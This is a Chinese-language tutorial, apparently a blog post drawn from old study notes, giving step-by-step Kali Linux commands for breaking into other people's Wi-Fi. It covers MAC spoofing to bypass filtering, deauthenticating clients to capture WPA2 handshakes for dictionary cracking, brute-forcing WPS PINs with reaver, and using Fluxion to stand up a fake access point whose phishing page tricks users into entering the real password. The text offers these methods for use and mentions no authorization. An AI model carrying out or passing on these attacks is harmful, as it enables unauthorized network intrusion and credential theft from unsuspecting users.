本文希望可以幫助到想要學習接觸此方面、或興趣使然的你,讓你有個大概的印象.
文中可能存在錯誤操作或錯誤理解,望大家不吝指正.
!閱前須知!
本文是基於我幾年前的一本筆記本,上面記錄了我學習網路基礎時的部分筆記
本文中的工具可能已經過時,或者使用方法已經改變了,感興趣可以深入查閱資料.
(但是我還是列出以前的使用方法供大家借鑑).
ps.若對無線攻擊手段與ARP欺騙感興趣可以參考以下兩篇文章
【無線安全實踐入門】基礎攻擊手段與常用工具簡介
【無線安全實踐入門】網路掃描和ARP欺騙
ps.
本文環境在Kali下,學習最好具備一點linux基礎知識.
本文中的'混雜模式'並不是所有網路卡都支援,詳請搜尋支援網路卡型號.
本文第一節和第二節的方法受限於硬體配置等因素,破解時間過長也是合理的.
1.Aircrack-ng套件
非常優秀的無線網路分析套件,功能強大.
許多安全軟體套件都預設(新增/呼叫)此套件來完成操作.
--首先,先要切換到能夠支援'混雜模式'的網路卡(一般都是購買USB無線網路卡)
--開啟混雜模式(開啟之後,網路卡名可能會改變)
> ifconfig (網路卡名) down
> iwconfig (網路卡名) mode monitor
> ifconfig (網路卡名) up
1.1.連線MAC地址繫結的wifi
--檢視附件網路中的wifi,並觀察其詳細資訊(channel、BSSID(MAC)等)
> airodump-ng (網路卡名)
--得知詳細資訊後,可以停止檢視(ctrl+c)
--開始拿有效的mac地址資訊(儘量等久點,包多點)
> airodump-ng -c (通道channel) --bssid (BSSID(MAC) (網路卡名)
--拿到有效mac地址(不要拿到路由器的mac)
--修改本機mac
> ifconfig (網路卡名) down
> macchanger -m (MAC地址) (網路卡名)
> ifconfig (網路卡名) up
--注意,此方法拿到有效mac地址,並未拿到wifi密碼
1.2.WPA2加密的wifi
--檢視附件網路中的wifi,並觀察其詳細資訊(channel、BSSID(MAC)等)
> airodump-ng (網路卡名)
--得知詳細資訊後,可以停止檢視(ctrl+c)
--開始進行檢視route與client的mac地址,[-w]選項的意思就是write
> airodump-ng -w wpa -c (通道channel) --bssid (BSSID(MAC) (網路卡名) --ignore-negative-one
--檢視route與client的mac地址
--開始獲得握手包.cap
> airoplay-ng --deauth 10 -a (route的mac) -c (client的mac) (網路卡名) --ignore-negative-one
--對握手包.cap進行破解
aircrack-ng -w (指定字典) (cap握手包名)
--字典可以自己製作(Crunch工具),也可以在網上下載大神的字典
--一個NB的字典,對你的破解!事半功倍!
1.3.WEP加密的wifi
--由於這種加密基本已經捨棄了,所以就不說了
2.路由器的PIN碼破解
通過輸入PIN碼來連線wifi也是可以的,PIN碼的破解也是一種不錯的方法.
常見的工具有reaver、minidwep-gtk等工具,這裡我就說下reaver工具.
--首先,先要切換到能夠支援'混雜模式'的網路卡(一般都是購買USB無線網路卡)
--開啟混雜模式(開啟之後,網路卡名可能會改變)
> ifconfig (網路卡名) down
> iwconfig (網路卡名) mode monitor
> ifconfig (網路卡名) up
--選做:可以嘗試掃描是否有啟用WPS的wifi
--Wash工具就是一款針對'判斷wifi是否啟用WPS'的工具
--檢視附件網路中的wifi,並觀察PWR值小於70的來破解(記錄BSSID,記住要是路由器的)
> airodump-ng (網路卡名)
--開始進行破解(注意是路由器的MAC地址,PIN碼是針對路由器的)
> reaver -i (網路卡名) -b (路由器MAC地址) -a -S -vv
--1.如果出現 warning fail to associate ...
--則說明破解失敗(失敗原因包括物件路由器未開啟WPS等)
--2.提示給出了 PIN碼 或 PIN碼和PSK金鑰(wifi密碼)
--則說明破解成功(記錄PIN碼)/(使用PSK金鑰直接嘗試連線wifi)
--選做:可以嘗試得到wifi密碼(PIN碼是可以連wifi)
reaver -i (網路卡名) -b (路由器MAC地址) -p (剛得到的PIN碼)
3.Fluxion工具(推薦)
一個非常不錯的社工破解wifi神器.
與前面操作思路不同.
它是通過模擬原有wifi(FakeAP),使用者進行連線
然後wifi會斷開網路,並向連線使用者傳送請求(瀏覽器跳轉頁面),請求輸入原wifi密碼
使用者在收到請求後,只需輸入正確密碼,wifi就會恢復網路,而你獲得wifi密碼
注意,Fluxion會自動判斷wifi密碼是否正確,從而做出下一步操作
ps.此方法的好處就是不用耗費資源去破解密碼.
ps.Fluxion執行時需要呼叫許多其它工具,部分工具可能需要另行下載(執行時會提示有哪些未下載)
--執行軟體(在軟體目錄下)
> ./fluxion
> 網路卡(選擇網路卡)
> channels(選擇所有通道)
> 掃描wifi(掃描到需要的結果時,按ctrl+c)
> 選擇wifi(輸入1、2、3等選擇)
--建立一個假AP
> 選擇攻擊方式(選FakeAP-Hostapd...)
> 選擇儲存路徑(可空格跳過,則儲存在桌面/root/Desktop/)
--會自動出現視窗
> 握手包選擇(aircrack-ng...)
--抓包分配包
> 資料包分配(Deauth all)
--若是以上步驟正確完成,等抓包抓完,會出現選擇
> 選擇web interface
> 選擇語言(提示使用者輸入密碼時的介面語言)
--等待使用者連線上網,在瀏覽器輸入正確密碼(工具會自動驗證密碼是否正確),工具就會自動停止
--獲得wifi正確密碼
破解wifi可以說是比較有意思、並且有挑戰性的一塊知識點了,
更多的無線攻防操作,其實都是建立在連入區域網的前提之下的.
加油,共勉